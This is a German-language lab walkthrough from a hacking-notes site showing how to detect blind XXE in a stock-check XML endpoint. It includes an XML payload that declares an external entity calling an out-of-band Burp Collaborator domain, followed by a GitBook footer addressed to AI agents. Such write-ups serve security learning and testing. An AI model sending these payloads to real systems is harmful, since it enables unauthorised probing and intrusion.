> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/de/web/xxe/blind-xxe-with-out-of-band-interaction.md).

# Blindes XXE mit Out-of-Band-Interaktion

### Blindes XXE mit Out-of-Band-Interaktion

Die Funktion „Bestand prüfen“ akzeptiert ein XML, aber **zeigt nicht** die Antwort. Dies ist ein blindes XXE: Sie sehen den vom Parser zurückgegebenen Inhalt nicht direkt. Um die Schwachstelle zu erkennen und auszunutzen, werden Out-of-Band-Interaktionen (OOB) erzeugt — zum Beispiel ein DNS-Lookup oder eine HTTP-Abfrage an eine kontrollierte Domain (Burp Collaborator / OAST) — um zu sehen, ob der Parser externe Anfragen ausführt.

{% code overflow="wrap" %}

```xml
<?xml version="1.0" encoding="UTF-8"?>
<stockCheck>
  <productId>
    Test
  </productId>
  <storeId>
    1
  </storeId>
  </stockCheck>
```

{% endcode %}

Wenn dieses XML übermittelt wird, erhält man keine Antwort von der Oberfläche (blindes Verhalten).

<figure><img src="/files/493368993cdcd531d28b0a3d9b3032274b86eb19" alt=""><figcaption></figcaption></figure>

#### Arbeiten mit externer Entität zu Burp Collaborator

Deklarieren Sie eine externe Entität, die auf eine kontrollierte Domain verweist (hier: `h4m66g65x80x7bwj3ueflms990fr3hr6.oastify.com`) um den Parser dazu zu zwingen, eine HTTP-/DNS-Anfrage auszuführen — wenn die Anfrage beim OOB-Dienst ankommt, ist die Anwendung für blindes XXE anfällig.

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY myFile SYSTEM "https://h4m66g65x80x7bwj3ueflms990fr3hr6.oastify.com">]>
<stockCheck>
  <productId>
    &myFile;
  </productId>
  <storeId>
    1
  </storeId>
  </stockCheck>
```

Nach dem Senden sehen wir den Eingang der Anfrage beim OOB-Dienst (Burp Collaborator), was das Vorhandensein eines blinden XXE mit Out-of-Band-Interaktion bestätigt.

<figure><img src="/files/443450119127668a5a087bc6ac62e134ac82333a" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/de/web/xxe/blind-xxe-with-out-of-band-interaction.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
